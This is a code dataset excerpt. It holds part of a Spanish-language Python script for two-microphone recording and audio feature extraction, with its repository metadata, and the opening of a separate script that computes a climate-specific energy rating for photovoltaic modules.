prim.append(array[z])\n prim2.append(array[z])\n prim3.append(array[z])\n prim4.append(array[z])\n prim5.append(array[z])\n prim6.append(array[z])\n prim7.append(array[z])\n prim8.append(array[z])\n prim9.append(array[z])\n prim10.append(array[z])\n prim11.append(array[z])\n prim12.append(array[z])\n prim13.append(array[z])\n prim14.append(array[z])\n prim15.append(array[z])\n prim16.append(array[z])\n prim17.append(array[z])\n prim18.append(array[z])\n prim19.append(array[z])\n prim20.append(array[z])\n prim21.append(array[z])\n prim22.append(array[z])\n prim23.append(array[z])\n prim24.append(array[z])\n prim25.append(array[z])\n prim26.append(array[z])\n prim27.append(array[z])\n prim28.append(array[z])\n prim29.append(array[z])\n prim30.append(array[z])\n valores_csv.append(prim)\n valores_csv.append(prim2)\n valores_csv.append(prim3)\n valores_csv.append(prim4)\n valores_csv.append(prim5)\n valores_csv.append(prim6)\n valores_csv.append(prim7)\n valores_csv.append(prim8)\n valores_csv.append(prim9)\n valores_csv.append(prim10)\n valores_csv.append(prim12)\n valores_csv.append(prim13)\n valores_csv.append(prim14)\n valores_csv.append(prim15)\n valores_csv.append(prim16)\n valores_csv.append(prim17)\n valores_csv.append(prim18)\n valores_csv.append(prim19)\n valores_csv.append(prim20)\n valores_csv.append(prim21)\n valores_csv.append(prim22)\n valores_csv.append(prim23)\n valores_csv.append(prim24)\n valores_csv.append(prim25)\n valores_csv.append(prim26)\n valores_csv.append(prim27)\n valores_csv.append(prim28)\n valores_csv.append(prim29)\n valores_csv.append(prim30)\n\n\n\n df1 = pd.DataFrame( valores_csv[:])\n print(df1)\n df1.to_csv(\"nombres_valores.csv\")\n\n\n if option == 89:\n a = pd.read_csv('nombres_individuales.csv')\n valores = a['nombres']\n valores_csv = []\n distancia = a['distancias']\n cont=0\n #print(len(valores))\n\n for i in range(0, int(len(valores)),2):\n\n dis = int(distancia[i])\n string = int(distancia[i])\n array = np.zeros(50, dtype=int).tolist()\n array[int(string / 10)] = 1\n #print(type(array))\n uno = str(str(valores[i]) + \".wav\")\n dos = str(str(valores[i + 1]) + \".wav\")\n y, sr = librosa.load(uno)\n y2, sr2 = librosa.load(dos)\n\n F,f_names=audioFeatureExtraction.stFeatureExtraction(y, sr, 0.050*sr, 0.025*sr)\n F2,f_names2=audioFeatureExtraction.stFeatureExtraction(y2, sr2, 0.050*sr2, 0.025*sr2)\n a=F[0,:].tolist()\n a1=F[1,:].tolist()\n a=a+a1\n b=F2[0,:].tolist()\n b1=F2[1,:].tolist()\n b=b+b1\n #print(a)\n #print(len(a))\n #print(f_names[0])\n #plt.plot(librosa.feature.melspectrogram(y))\n #plt.show()\n\n #print(len(sig1)/rate1)\n #(rate2, sig2) = wav.read(dos)\n\n #mfcc_feat1 = mfcc(sig1, 44100,nfft=2046)\n #print(\"mfcc\",( len(mfcc_feat1[1,:]) ))\n #mfcc_feat2 = mfcc(sig2, 44100,nfft=2046)\n #fbank_feat1 = logfbank(sig1, rate1,nfft=2046)\n #print(\"fbank\", len(fbank_feat1[1,:]))\n #fbank_feat2 = logfbank(sig2, rate2,nfft=2046)\n #features1 = np.concatenate((mfcc_feat1, fbank_feat1), axis=1)\n #features2 = np.concatenate((mfcc_feat2, fbank_feat2), axis=1)\n #plt.imshow(fbank_feat1)\n #plt.show()\n #print(\"f1\",features1)\n #print(\"f2\",features2)\n #print(\"fbank\",fbank_feat2)\n #a=(fbank_feat1[1,:]).tolist()\n #b=(fbank_feat2[1,:]).tolist()\n #a=(mfcc_feat1[1,:]).tolist()\n #a1=(mfcc_feat[2,:]).tolist()\n #a2=(mfcc_feat[3,:]).tolist()\n #a=(features1[1,:]).tolist()\n #b=(features2[1,:]).tolist()\n c=a+b+array\n #b=(mfcc_feat2[1,:]).tolist()\n #b1=(mfcc_feat2[2,:]).tolist()\n #b2=(mfcc_feat2[3,:]).tolist()\n #a=a+a1+a2\n #b=b+b1+b2\n #c=a+b\n #d=c+array\n valores_csv.append(c)\n\n\n df1 = pd.DataFrame(valores_csv[:])\n df1.to_csv(\"mfcc.csv\")\n\n if option == 10:\n aux= True\n if option == 11:\n a = pd.read_csv('nombres_diferencias.csv')\n valores = a['nombres']\n uno = str(\"1_\" + str(1559259194) + \".wav\")\n dos = str(\"2_\" + str(1559259194) + \".wav\")\n archivo = wave.open(uno, 'rb')\n archivo2 = wave.open(dos, 'rb')\n canales = archivo.getnchannels()\n frames = archivo.getframerate()\n fs = frames\n datos = archivo.getparams()\n samples = archivo.getsampwidth()\n data = archivo.readframes(-1)\n data2 = archivo2.readframes(-1)\n signal = np.frombuffer(data, 'Int16')\n signal2 = np.frombuffer(data2, 'Int16')\n fft_signal = np.fft.fft(signal)\n W = np.fft.fftfreq(len(signal))\n cut_f_signal = fft_signal.copy()\n cut_f_signal[(W < 0.01)] = 0\n cut_f_signal[(W > 0.2)] = 0\n final = np.fft.ifft(cut_f_signal)\n\n plt.plot(fft_signal)\n plt.show()\n\n else:\n print(\"opcion no valida\")\n print(\"presiona enter\")\n input()\n\n # silencio = silence.detect_silence(myaudio, min_silence_len=1, silence_thresh=16)\n\n # silencio2 = silence.detect_nonsilent(myaudio, min_silence_len=1, silence_thresh=-30)\n # silencio = [((start/1000),(stop/1000)) for start,stop in silencio] #convert to sec\n # print(silencio2)\n # print(silencio[0][1])\n # print(silencio[0][1])\n # print(silencio2[0][1])\n\n #p1 = Process(target=ejecutar_doc1())\n #p1.start()\n #p2 = Process(target=ejecutar_doc2)\n #p2.start()\n #p1.join()\n #p2.join()\n\n #hilo1 = threading.Thread(target=ejecutar_doc1(),daemon=True)\n #hilo2 = threading.Thread(target=ejecutar_doc2(),daemon=True)\n\n #hilo1.start()\n #hilo2.start()\n\n\n\n\n\n\n\n\n\n # graba simultaneamente 2 microfonos\n", "repo_name": "marceloespinozap/grabacion-2-mics", "sub_path": "final.py", "file_name": "final.py", "file_ext": "py", "file_size_in_byte": 53364, "program_lang": "python", "lang": "es", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "warnings.simplefilter", "line_number": 36, "usage_type": "call"}, {"api_name": "warnings.simplefilter", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.frombuffer", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.frombuffer", "line_number": 48, "usage_type": "call"}, {"api_name": "pylab.figure", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 51, "usage_type": "call"}, {"api_name": "pylab.subplot", "line_number": 52, "usage_type": "call"}, {"api_name": "pylab.plot", "line_number": 53, "usage_type": "call"}, {"api_name": "pylab.plot", "line_number": 54, "usage_type": "call"}, {"api_name": "pylab.xlabel", "line_number": 55, "usage_type": "call"}, {"api_name": "pylab.ylabel", "line_number": 56, "usage_type": "call"}, {"api_name": "pylab.subplot", "line_number": 59, "usage_type": "call"}, {"api_name": "pylab.plot", "line_number": 60, "usage_type": "call"}, {"api_name": "pylab.plot", "line_number": 61, "usage_type": "call"}, {"api_name": "pylab.xlabel", "line_number": 62, "usage_type": "call"}, {"api_name": "pylab.ylabel", "line_number": 63, "usage_type": "call"}, {"api_name": "pylab.show", "line_number": 66, "usage_type": "call"}, {"api_name": "sounddevice.default", "line_number": 73, "usage_type": "attribute"}, {"api_name": "sounddevice.default", "line_number": 75, "usage_type": "attribute"}, {"api_name": "sounddevice.default", "line_number": 77, "usage_type": "attribute"}, {"api_name": "sounddevice.rec", "line_number": 80, "usage_type": "call"}, {"api_name": "sounddevice.wait", "line_number": 81, "usage_type": "call"}, {"api_name": "sounddevice.stop", "line_number": 83, "usage_type": "call"}, {"api_name": "soundfile.write", "line_number": 85, "usage_type": "call"}, {"api_name": "sounddevice.default", "line_number": 91, "usage_type": "attribute"}, {"api_name": "sounddevice.default", "line_number": 93, "usage_type": "attribute"}, {"api_name": "sounddevice.default", "line_number": 95, "usage_type": "attribute"}, {"api_name": "sounddevice.rec", "line_number": 97, "usage_type": "call"}, {"api_name": "sounddevice.wait", "line_number": 98, "usage_type": "call"}, {"api_name": "sounddevice.stop", "line_number": 100, "usage_type": "call"}, {"api_name": "soundfile.write", "line_number": 102, "usage_type": "call"}, {"api_name": "pydub.AudioSegment.from_wav", "line_number": 105, "usage_type": "call"}, {"api_name": "pydub.AudioSegment", "line_number": 105, "usage_type": "name"}, {"api_name": "pydub.AudioSegment.from_wav", "line_number": 106, "usage_type": "call"}, {"api_name": "pydub.AudioSegment", "line_number": 106, "usage_type": "name"}, {"api_name": "pydub.silence.detect_nonsilent", "line_number": 107, "usage_type": "call"}, {"api_name": "pydub.silence", "line_number": 107, "usage_type": "name"}, {"api_name": "pydub.silence.detect_nonsilent", "line_number": 108, "usage_type": "call"}, {"api_name": "pydub.silence", "line_number": 108, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 112, "usage_type": "call"}, {"api_name": "os.path", "line_number": 112, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 114, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 116, "usage_type": "call"}, {"api_name": "os.path", "line_number": 116, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 118, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 120, "usage_type": "call"}, {"api_name": "os.path", "line_number": 120, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 122, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 124, "usage_type": "call"}, {"api_name": "os.path", "line_number": 124, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 126, "usage_type": "call"}, {"api_name": "warnings.simplefilter", "line_number": 136, "usage_type": "call"}, {"api_name": "sounddevice.default", "line_number": 138, "usage_type": "attribute"}, {"api_name": "sounddevice.default", "line_number": 140, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 188, "usage_type": "call"}, {"api_name": "time.time", "line_number": 192, "usage_type": "call"}, {"api_name": "multiprocessing.Process", "line_number": 193, "usage_type": "call"}, {"api_name": "multiprocessing.Process", "line_number": 195, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 200, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 202, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 209, "usage_type": "call"}, {"api_name": "wave.open", "line_number": 216, "usage_type": "call"}, {"api_name": "wave.open", "line_number": 217, "usage_type": "call"}, {"api_name": "numpy.frombuffer", "line_number": 225, "usage_type": "call"}, {"api_name": "numpy.frombuffer", "line_number": 226, "usage_type": "call"}, {"api_name": "sounddevice.query_devices", "line_number": 231, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 232, "usage_type": "call"}, {"api_name": "wave.open", "line_number": 239, "usage_type": "call"}, {"api_name": "wave.open", "line_number": 240, "usage_type": "call"}, {"api_name": "numpy.frombuffer", "line_number": 248, "usage_type": "call"}, {"api_name": "numpy.fft.fftfreq", "line_number": 249, "usage_type": "call"}, {"api_name": "numpy.fft", "line_number": 249, "usage_type": "attribute"}, {"api_name": "numpy.fft.fft", "line_number": 251, "usage_type": "call"}, {"api_name": "numpy.fft", "line_number": 251, "usage_type": "attribute"}, {"api_name": "numpy.abs", "line_number": 252, "usage_type": "call"}, {"api_name": "pylab.plot", "line_number": 255, "usage_type": "call"}, {"api_name": "pylab.xlabel", "line_number": 257, "usage_type": "call"}, {"api_name": "pylab.ylabel", "line_number": 258, "usage_type": "call"}, {"api_name": "pylab.gca", "line_number": 261, "usage_type": "call"}, {"api_name": "pylab.show", "line_number": 265, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 269, "usage_type": "call"}, {"api_name": "wave.open", "line_number": 277, "usage_type": "call"}, {"api_name": "wave.open", "line_number": 278, "usage_type": "call"}, {"api_name": "numpy.frombuffer", "line_number": 286, "usage_type": "call"}, {"api_name": "numpy.fft.fftfreq", "line_number": 289, "usage_type": "call"}, {"api_name": "numpy.fft", "line_number": 289, "usage_type": "attribute"}, {"api_name": "numpy.fft.fft", "line_number": 291, "usage_type": "call"}, {"api_name": "numpy.fft", "line_number": 291, "usage_type": "attribute"}, {"api_name": "numpy.abs", "line_number": 292, "usage_type": "call"}, {"api_name": "numpy.fft.ifft", "line_number": 306, "usage_type": "call"}, {"api_name": "numpy.fft", "line_number": 306, "usage_type": "attribute"}, {"api_name": "scipy.io.wavfile.write", "line_number": 312, "usage_type": "call"}, {"api_name": "scipy.io.wavfile", "line_number": 312, "usage_type": "name"}, {"api_name": "numpy.frombuffer", "line_number": 313, "usage_type": "call"}, {"api_name": "numpy.fft.fft", "line_number": 314, "usage_type": "call"}, {"api_name": "numpy.fft", "line_number": 314, "usage_type": "attribute"}, {"api_name": "numpy.fft.fftfreq", "line_number": 315, "usage_type": "call"}, {"api_name": "numpy.fft", "line_number": 315, "usage_type": "attribute"}, {"api_name": "numpy.fft.fft", "line_number": 317, "usage_type": "call"}, {"api_name": "numpy.fft", "line_number": 317, "usage_type": "attribute"}, {"api_name": "pylab.xlabel", "line_number": 327, "usage_type": "call"}, {"api_name": "pylab.ylabel", "line_number": 328, "usage_type": "call"}, {"api_name": "pylab.xlabel", "line_number": 332, "usage_type": "call"}, {"api_name": "pylab.ylabel", "line_number": 333, "usage_type": "call"}, {"api_name": "numpy.fft.ifft", "line_number": 338, "usage_type": "call"}, {"api_name": "numpy.fft", "line_number": 338, "usage_type": "attribute"}, {"api_name": "scipy.io.wavfile.write", "line_number": 344, "usage_type": "call"}, {"api_name": "scipy.io.wavfile", "line_number": 344, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 346, "usage_type": "call"}, {"api_name": "wave.open", "line_number": 351, "usage_type": "call"}, {"api_name": "wave.open", "line_number": 352, "usage_type": "call"}, {"api_name": "numpy.frombuffer", "line_number": 360, "usage_type": "call"}, {"api_name": "numpy.frombuffer", "line_number": 361, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 386, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 399, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 402, "usage_type": "call"}, {"api_name": "wave.open", "line_number": 415, "usage_type": "call"}, {"api_name": "wave.open", "line_number": 416, "usage_type": "call"}, {"api_name": "numpy.frombuffer", "line_number": 424, "usage_type": "call"}, {"api_name": "numpy.frombuffer", "line_number": 425, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 437, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 438, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 475, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 476, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 483, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 484, "usage_type": "call"}, {"api_name": "pydub.AudioSegment.from_wav", "line_number": 503, "usage_type": "call"}, {"api_name": "pydub.AudioSegment", "line_number": 503, "usage_type": "name"}, {"api_name": "pydub.AudioSegment.from_wav", "line_number": 508, "usage_type": "call"}, {"api_name": "pydub.AudioSegment", "line_number": 508, "usage_type": "name"}, {"api_name": "numpy.abs", "line_number": 527, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 528, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 534, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 535, "usage_type": "call"}, {"api_name": "pydub.AudioSegment.from_wav", "line_number": 559, "usage_type": "call"}, {"api_name": "pydub.AudioSegment", "line_number": 559, "usage_type": "name"}, {"api_name": "pydub.AudioSegment.from_wav", "line_number": 564, "usage_type": "call"}, {"api_name": "pydub.AudioSegment", "line_number": 564, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 572, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 576, "usage_type": "call"}, {"api_name": "wave.open", "line_number": 583, "usage_type": "call"}, {"api_name": "wave.open", "line_number": 584, "usage_type": "call"}, {"api_name": "numpy.frombuffer", "line_number": 592, "usage_type": "call"}, {"api_name": "numpy.frombuffer", "line_number": 593, "usage_type": "call"}, {"api_name": "pylab.subplot", "line_number": 594, "usage_type": "call"}, {"api_name": "pylab.title", "line_number": 595, "usage_type": "call"}, {"api_name": "pylab.plot", "line_number": 596, "usage_type": "call"}, {"api_name": "pylab.plot", "line_number": 597, "usage_type": "call"}, {"api_name": "pylab.gca", "line_number": 598, "usage_type": "call"}, {"api_name": "pylab.subplot", "line_number": 599, "usage_type": "call"}, {"api_name": "pylab.title", "line_number": 600, "usage_type": "call"}, {"api_name": "pylab.plot", "line_number": 601, "usage_type": "call"}, {"api_name": "pylab.plot", "line_number": 602, "usage_type": "call"}, {"api_name": "pylab.gca", "line_number": 603, "usage_type": "call"}, {"api_name": "pylab.show", "line_number": 604, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 607, "usage_type": "call"}, {"api_name": "wave.open", "line_number": 614, "usage_type": "call"}, {"api_name": "wave.open", "line_number": 615, "usage_type": "call"}, {"api_name": "numpy.frombuffer", "line_number": 623, "usage_type": "call"}, {"api_name": "numpy.frombuffer", "line_number": 624, "usage_type": "call"}, {"api_name": "scipy.signal.spectrogram", "line_number": 625, "usage_type": "call"}, {"api_name": "scipy.signal", "line_number": 625, "usage_type": "name"}, {"api_name": "pylab.pcolormesh", "line_number": 627, "usage_type": "call"}, {"api_name": "pylab.gca", "line_number": 628, "usage_type": "call"}, {"api_name": "pylab.ylabel", "line_number": 630, "usage_type": "call"}, {"api_name": "pylab.xlabel", "line_number": 631, "usage_type": "call"}, {"api_name": "pylab.show", "line_number": 632, "usage_type": "call"}, {"api_name": "scipy.signal.spectrogram", "line_number": 633, "usage_type": "call"}, {"api_name": "scipy.signal", "line_number": 633, "usage_type": "name"}, {"api_name": "pylab.pcolormesh", "line_number": 635, "usage_type": "call"}, {"api_name": "pylab.gca", "line_number": 636, "usage_type": "call"}, {"api_name": "pylab.ylabel", "line_number": 638, "usage_type": "call"}, {"api_name": "pylab.xlabel", "line_number": 639, "usage_type": "call"}, {"api_name": "pylab.show", "line_number": 640, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 643, "usage_type": "call"}, {"api_name": "wave.open", "line_number": 650, "usage_type": "call"}, {"api_name": "wave.open", "line_number": 651, "usage_type": "call"}, {"api_name": "numpy.frombuffer", "line_number": 659, "usage_type": "call"}, {"api_name": "numpy.frombuffer", "line_number": 660, "usage_type": "call"}, {"api_name": "pylab.subplot", "line_number": 662, "usage_type": "call"}, {"api_name": "pylab.title", "line_number": 663, "usage_type": "call"}, {"api_name": "pylab.plot", "line_number": 665, "usage_type": "call"}, {"api_name": "pylab.plot", "line_number": 666, "usage_type": "call"}, {"api_name": "pylab.subplot", "line_number": 674, "usage_type": "call"}, {"api_name": "pylab.title", "line_number": 675, "usage_type": "call"}, {"api_name": "scipy.signal.fftconvolve", "line_number": 677, "usage_type": "call"}, {"api_name": "pylab.plot", "line_number": 678, "usage_type": "call"}, {"api_name": "pylab.show", "line_number": 679, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 683, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 695, "usage_type": "call"}, {"api_name": "wave.open", "line_number": 701, "usage_type": "call"}, {"api_name": "wave.open", "line_number": 702, "usage_type": "call"}, {"api_name": "numpy.frombuffer", "line_number": 707, "usage_type": "call"}, {"api_name": "numpy.frombuffer", "line_number": 708, "usage_type": "call"}, {"api_name": "scipy.signal.fftconvolve", "line_number": 729, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 730, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 732, "usage_type": "call"}, {"api_name": "pylab.plot", "line_number": 796, "usage_type": "call"}, {"api_name": "pylab.show", "line_number": 797, "usage_type": "call"}, {"api_name": "python_speech_features.mfcc", "line_number": 798, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 798, "usage_type": "call"}, {"api_name": "numpy.log10", "line_number": 798, "usage_type": "call"}, {"api_name": "pylab.plot", "line_number": 799, "usage_type": "call"}, {"api_name": "pylab.show", "line_number": 800, "usage_type": "call"}, {"api_name": "python_speech_features.mfcc", "line_number": 801, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 801, "usage_type": "call"}, {"api_name": "python_speech_features.mfcc", "line_number": 802, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 802, "usage_type": "call"}, {"api_name": "python_speech_features.mfcc", "line_number": 803, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 803, "usage_type": "call"}, {"api_name": "python_speech_features.mfcc", "line_number": 804, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 804, "usage_type": "call"}, {"api_name": "python_speech_features.mfcc", "line_number": 805, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 805, "usage_type": "call"}, {"api_name": "python_speech_features.mfcc", "line_number": 806, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 806, "usage_type": "call"}, {"api_name": "python_speech_features.mfcc", "line_number": 807, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 807, "usage_type": "call"}, {"api_name": "python_speech_features.mfcc", "line_number": 808, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 808, "usage_type": "call"}, {"api_name": "python_speech_features.mfcc", "line_number": 809, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 809, "usage_type": "call"}, {"api_name": "python_speech_features.mfcc", "line_number": 810, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 810, "usage_type": "call"}, {"api_name": "python_speech_features.mfcc", "line_number": 811, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 811, "usage_type": "call"}, {"api_name": "python_speech_features.mfcc", "line_number": 812, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 812, "usage_type": "call"}, {"api_name": "python_speech_features.mfcc", "line_number": 813, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 813, "usage_type": "call"}, {"api_name": "python_speech_features.mfcc", "line_number": 814, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 814, "usage_type": "call"}, {"api_name": "python_speech_features.mfcc", "line_number": 815, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 815, "usage_type": "call"}, {"api_name": "python_speech_features.mfcc", "line_number": 816, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 816, "usage_type": "call"}, {"api_name": "python_speech_features.mfcc", "line_number": 817, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 817, "usage_type": "call"}, {"api_name": "python_speech_features.mfcc", "line_number": 818, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 818, "usage_type": "call"}, {"api_name": "python_speech_features.mfcc", "line_number": 819, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 819, "usage_type": "call"}, {"api_name": "python_speech_features.mfcc", "line_number": 820, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 820, "usage_type": "call"}, {"api_name": "python_speech_features.mfcc", "line_number": 821, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 821, "usage_type": "call"}, {"api_name": "python_speech_features.mfcc", "line_number": 822, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 822, "usage_type": "call"}, {"api_name": "python_speech_features.mfcc", "line_number": 823, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 823, "usage_type": "call"}, {"api_name": "python_speech_features.mfcc", "line_number": 824, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 824, "usage_type": "call"}, {"api_name": "python_speech_features.mfcc", "line_number": 825, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 825, "usage_type": "call"}, {"api_name": "python_speech_features.mfcc", "line_number": 826, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 826, "usage_type": "call"}, {"api_name": "python_speech_features.mfcc", "line_number": 827, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 827, "usage_type": "call"}, {"api_name": "python_speech_features.mfcc", "line_number": 828, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 828, "usage_type": "call"}, {"api_name": "python_speech_features.mfcc", "line_number": 829, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 829, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 990, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 996, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 1007, "usage_type": "call"}, {"api_name": "librosa.load", "line_number": 1012, "usage_type": "call"}, {"api_name": "librosa.load", "line_number": 1013, "usage_type": "call"}, {"api_name": "pyAudioAnalysis.audioFeatureExtraction.stFeatureExtraction", "line_number": 1015, "usage_type": "call"}, {"api_name": "pyAudioAnalysis.audioFeatureExtraction", "line_number": 1015, "usage_type": "name"}, {"api_name": "pyAudioAnalysis.audioFeatureExtraction.stFeatureExtraction", "line_number": 1016, "usage_type": "call"}, {"api_name": "pyAudioAnalysis.audioFeatureExtraction", "line_number": 1016, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 1063, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 1069, "usage_type": "call"}, {"api_name": "wave.open", "line_number": 1073, "usage_type": "call"}, {"api_name": "wave.open", "line_number": 1074, "usage_type": "call"}, {"api_name": "numpy.frombuffer", "line_number": 1082, "usage_type": "call"}, {"api_name": "numpy.frombuffer", "line_number": 1083, "usage_type": "call"}, {"api_name": "numpy.fft.fft", "line_number": 1084, "usage_type": "call"}, {"api_name": "numpy.fft", "line_number": 1084, "usage_type": "attribute"}, {"api_name": "numpy.fft.fftfreq", "line_number": 1085, "usage_type": "call"}, {"api_name": "numpy.fft", "line_number": 1085, "usage_type": "attribute"}, {"api_name": "numpy.fft.ifft", "line_number": 1089, "usage_type": "call"}, {"api_name": "numpy.fft", "line_number": 1089, "usage_type": "attribute"}, {"api_name": "pylab.plot", "line_number": 1091, "usage_type": "call"}, {"api_name": "pylab.show", "line_number": 1092, "usage_type": "call"}]} +{"seq_id": "42573541840", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nClimate Specific Energy Rating (CSER)\r\n\r\n@author: dguzmanr\r\n@modified: mriveraa\r\n\"\"\"\r\n# Importing the Steps Function\r\nimport sim_steps\r\n# Importing the Energy rating functions\r\nimport energy_rating_functions as energy_rating\r\n# Importing read functions\r\nimport read_functions\r\nimport pandas as pd\r\n# Importing execution functions\r\nimport utils\r\nimport plotting\r\n# Import Module\r\nimport os\r\n\r\n\r\n\r\ndef get_ini_data(module_df, eta, module_area, folder_locations, site_name):\r\n # Get the interpolation object with eta, temp, irradiance, etc\r\n # From CalLab measurements\r\n eta_interpolated, pnom, eta_matrix, hey_matrix, alpha =\\\r\n energy_rating.get_eta_interpolation(module_df= module_df,\r\n module_area= module_area,\r\n eta_calc= eta)\r\n\r\n # Reading climate data\r\n climate_data = read_functions.read_climate_locs(\r\n folder_locations=folder_locations,\r\n loc_name=site_name)\r\n \r\n # Changing names to climate df for simulation\r\n climate_data = read_functions.change_names_climate_df(\r\n climate_df=climate_data)\r\n return (eta_interpolated, pnom, eta_matrix, hey_matrix, climate_data, alpha)\r\n\r\n\r\ndef get_simulation(climate_data, lat, lon, ele, alpha, tech, pnom, mod_area,\r\n eta_interpolated, u0, u1, a_r, power_matrix, pv_azimuth=180, pv_tilt=20,\r\n spec_resp_factor=1.0):\r\n\r\n # =======================================================================\r\n # Energy rating Module\r\n # =======================================================================\r\n cser_er, eta_avg_er, sim_er_df = sim_steps.ersim_dc_steps(\r\n climate_data=climate_data.copy(),\r\n pv_tilt=pv_tilt,\r\n eta_interpolated=eta_interpolated,\r\n pnom=pnom,\r\n mod_area=mod_area,\r\n u0=u0,\r\n u1=u1,\r\n a_r=a_r,\r\n spec_resp_factor=spec_resp_factor,\r\n power_matrix= power_matrix)\r\n # Creating a DataFrame with results\r\n ret_df = pd.DataFrame(columns=[\"cser_ER\", \"eta_avg_ER\"])\r\n ret_df.at[0, \"cser_ER\"] = cser_er\r\n ret_df.at[0, \"eta_avg_ER\"] = eta_avg_er\r\n return sim_er_df, ret_df\r\n\r\n\r\n\r\ndef simulation_er(folder):\r\n\r\n # =======================================================================\r\n # Folder and paths info\r\n # =======================================================================\r\n # Folder with the standard's files\r\n folder_locations = \"the_standard\"\r\n # Change the directory\r\n os.chdir(folder)\r\n #Creating directory\r\n os.makedirs('results/plots', exist_ok=True)\r\n \r\n #Create data frame for results\r\n climate = ['Tropical humid', 'Subtropical arid (desert)',\r\n 'Subtropical coastal', 'Temperate coastal',\r\n 'High elevation (above 3 000 m)', 'Temperate continental']\r\n results_df_cser = pd.DataFrame({\"Std_climate\": climate})\r\n results_df_eta = pd.DataFrame({\"Std_climate\": climate})\r\n\r\n # =======================================================================\r\n # Simulation for the 6 standard climates\r\n # =======================================================================\r\n\r\n # iterate through all file\r\n for file in os.listdir():\r\n # Check whether file is in text format or not\r\n if file.endswith(\".txt\"):\r\n file_path = f\"{folder}\\{file}\"\r\n \r\n (mod_parameters, spec_resp, power_matrix, ar,\r\n u0, u1, module_area, tech, int_id) = read_functions.read_callab_stdfile(path = file_path)\r\n \r\n cser = []\r\n eta = []\r\n for location in range(6):\r\n \r\n std_location = read_functions.read_standard_locations(location)\r\n # Getting initial data\r\n (eta_interpolated, pnom, eta_matrix, hey_matrix,\r\n climate_data, alpha) = get_ini_data(\r\n module_df = power_matrix,\r\n eta= False,\r\n module_area = module_area,\r\n folder_locations=folder_locations,\r\n site_name=std_location[\"loc\"])\r\n \r\n # Running simulations\r\n sim_er_df, ret_df = get_simulation(\r\n climate_data=climate_data,\r\n lat=std_location[\"site_lat\"],\r\n lon=std_location[\"site_lon\"],\r\n ele=std_location[\"site_ele\"],\r\n 